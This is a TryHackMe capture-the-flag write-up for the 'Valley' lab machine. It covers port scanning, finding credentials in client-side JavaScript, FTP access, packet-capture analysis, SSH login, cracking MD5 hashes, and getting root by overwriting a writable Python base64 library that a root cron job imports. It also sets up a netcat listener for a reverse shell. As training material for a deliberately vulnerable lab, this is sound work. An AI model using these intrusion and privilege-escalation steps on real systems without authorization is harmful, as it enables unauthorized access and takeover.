Valley - TryHackMe writeup

This challenge is from TryHackMe

Writeup

Port scan

Start ping scan on all ports

$ nmap -Pn $IP -p-  

Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
37370/tcp open  unknown

We have 3 ports open - Let's scan them

$ nmap -sC -sV $IP -p37370,22,80

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2842ac1225a10f16616dda0f6046295 (RSA)
|   256 429e2ff63e5adb51996271c48c223ebb (ECDSA)
|_  256 2ea0a56cd983e0016cb98a609b638672 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
37370/tcp open  ftp     vsftpd 3.0.3
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

We have OpenSSH, Apache and vsftpd

Website Enumeration

On website I found note.txt in /pricing

J,
Please stop leaving notes randomly on the website
-RP

So there might be some notes - let's bust /static directory beacouse we can't list it from the webpage

$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://$IP/static  -x php,html
[...]

/00                   (Status: 200) [Size: 127]
/11                   (Status: 200) [Size: 627909]
/3                    (Status: 200) [Size: 421858]
/13                   (Status: 200) [Size: 3673497]
/12                   (Status: 200) [Size: 2203486]
/10                   (Status: 200) [Size: 2275927]
/5                    (Status: 200) [Size: 1426557]
[...]

Files with names from 1-19 are photos from /gallery but in /00 we have earlier mentioned note left

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

So it has a hidden directory /dev1243224123123 - After visiting it, we have some login form

If we try to log in, we see that auth mechanism is possibly written in js - We have it in dev.js file in
Our hidden directory

[...]
if (username === "siemDev" && password === "[Password]") {
        window.location.href = "/dev1243224123123/devNotes37370.txt";
    } else {
        loginErrorMsg.style.opacity = 1;
    }

There, we have credentials for this form and some other link to dev notes

There is another note

dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port

If we trust what they say, they are reusing credentials - siemDev with it's password may be our FTP creds

FTP

First - log into FTP

$ ftp $IP -p 37370
220 (vsFTPd 3.0.3)
Name (10.10.97.110:wizarddos): siemDev
331 Please specify the password.
Password:  [Password]
230 Login successful.

ftp>

We are in - list directories and let's see what we have there

ftp> ls
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000         7272 Mar 06 13:55 siemFTP.pcapng
-rw-rw-r--    1 1000     1000      1978716 Mar 06 13:55 siemHTTP1.pcapng
-rw-rw-r--    1 1000     1000      1972448 Mar 06 14:06 siemHTTP2.pcapng

These look like captured internet packages - Let's download them and analyze by wireshark

ftp> get siemFTP.pcapng

local: siemFTP.pcapng remote: siemFTP.pcapng
229 Entering Extended Passive Mode (|||44679|)
150 Opening BINARY mode data connection for siemFTP.pcapng (7272 bytes).
100% |***********************************************************************|  7272       80.64 MiB/s    00:00 ETA
226 Transfer complete.
7272 bytes received in 00:00 (69.47 KiB/s)

ftp> get siemHTTP1.pcapng

local: siemHTTP1.pcapng remote: siemHTTP1.pcapng
229 Entering Extended Passive Mode (|||30906|)
150 Opening BINARY mode data connection for siemHTTP1.pcapng (1978716 bytes).
100% |***********************************************************************|  1932 KiB  375.53 KiB/s    00:00 ETA
226 Transfer complete.
1978716 bytes received in 00:05 (371.80 KiB/s)

ftp> get siemHTTP2.pcapng

local: siemHTTP2.pcapng remote: siemHTTP2.pcapng
229 Entering Extended Passive Mode (|||21876|)
150 Opening BINARY mode data connection for siemHTTP2.pcapng (1972448 bytes).
100% |***********************************************************************|  1926 KiB  555.25 KiB/s    00:00 ETA
226 Transfer complete.
1972448 bytes received in 00:03 (546.64 KiB/s)

ftp> exit
221 Goodbye.

$

Hop into wireshark and analyze them

PCAP analysis

In TCP stream nr. 0 of siemFTP.pcapng we see an attacker loged into FTP using anonymous login, but we can't do it. This FTP daemon doesn't allow anon login

But in siemHTTP2.pcapng we have found something interesting

In TCP stream nr. 31 we have HTTP POST request to log in somewhere using valleyDev credentials - this may be for SSH

SSH and user flag

$ ssh valleyDev@$IP
valleyDev@10.10.29.225's password: [Password]

[...]

valleyDev@valley:~: 

We are in! - get the user flag

$ ls
user.txt
$ cat user.txt
[User Flag]

We have it

Now let's do privesc

Privilage escalation

In a /home dir we have valleyAuthenticator - this may help us escalate to another user and access more information

Escalation to another user

Let's download it and perform strings analysis on it

$ strings valleyAuthenticator
[...]

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $

[...]

This is basicly UPX archive - let's unpack it

$ upx -d valleyAuthenticator
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2285616 <-    749128   32.78%   linux/amd64   valleyAuthenticator

Unpacked 1 file.

Note: UPX overrides passed file - It's better to not do it on attacked machine

Now, we can look for some passwords

$ strings valleyAuthenticator | grep -i pass -B 15 -A 15
[...]
e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb
[...]

We have 2 hashes - let's put them into hash.txt file and crack them with hashcat

$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
[...]

dd2921cc76ee3abfd2beb60709056cfb:valley                   
e6722920bab2326f8217e4bf6b1b58ac:[Cracked Hash]             

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hash.txt

[...]

And we have credentials for this file

Let's use it and log into

$ ./valleyAuthenticator
Welcome to Valley Inc. Authenticator
What is your username: valley
What is your password: [Password]
Authenticated

$ su valley
Password: 

Now we have access to /home/valley

I see nothing interesting so let's find something else

We have some cronjob running in a background

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *   * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6   * * *    root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6   * * 7    root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6   1 * *    root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
1  *    * * *   root    python3 /photos/script/photosEncrypt.py

We can't override photosEncrypt.py script but let's see what it does - we may find some privesc vector

$ cat  photosEncrypt.py

#!/usr/bin/python3
import base64
for i in range(1,7):
# specify the path to the image file you want to encode
   image_path = "/photos/p" + str(i) + ".jpg"

# open the image file and read its contents
   with open(image_path, "rb") as image_file:
          image_data = image_file.read()

# encode the image data in Base64 format
   encoded_image_data = base64.b64encode(image_data)

# specify the path to the output file
   output_path = "/photos/photoVault/p" + str(i) + ".enc"

# write the Base64-encoded image data to the output file
   with open(output_path, "wb") as output_file:
         output_file.write(encoded_image_data)

This file uses base64 module - if we overwrite it we can get a reverse shell for root

This is called library hijacking

Let's check where is this library located

$ locate base64.py
/snap/core20/1611/usr/lib/python3.8/base64.py
/snap/core20/1828/usr/lib/python3.8/base64.py
/usr/lib/python3.8/base64.py

We found it in /usr/lib/python3.8 - let's check if we can write it

$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxr-x 1 root valleyAdmin 20382 Mar 13 03:26 /usr/lib/python3.8/base64.py

Users in groups root and valleyAdmin can write this file - Are we in on of these?

$ groups
valley valleyAdmin

We are in valleyAdmin - we can override it

Delete whole content and write reverse shell into it - I used one from highon.coffee

Then set up your netcat listener

$ nc -lvnp [PORT}

And almost immediately after starting listener we have root shell - get the root flag

$ cat root.txt
[Root Flag]

That's it - Machine Pwned

Conclusion

Kinda fresh (When I was writing this it was 8 days old) and interesting machine

I had some moments, when I didn't know what to do but finally I managed to solve everything

See you in next writeup